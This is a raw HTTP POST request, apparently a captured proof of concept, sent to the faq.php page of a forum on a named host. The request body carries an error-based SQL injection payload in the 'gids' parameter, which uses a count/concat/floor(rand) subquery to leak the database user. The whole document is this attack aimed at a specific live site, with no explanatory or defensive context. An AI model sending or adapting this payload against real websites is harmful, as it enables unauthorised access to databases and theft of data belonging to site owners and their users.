POST /bbs/faq.php?action=grouppermission&searchgroupid=3 HTTP/1.1
Host: en.huayugame.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: wkc_sid=jl34HL
X-Forwarded-For: 1.1.1.12
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 140

gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)#
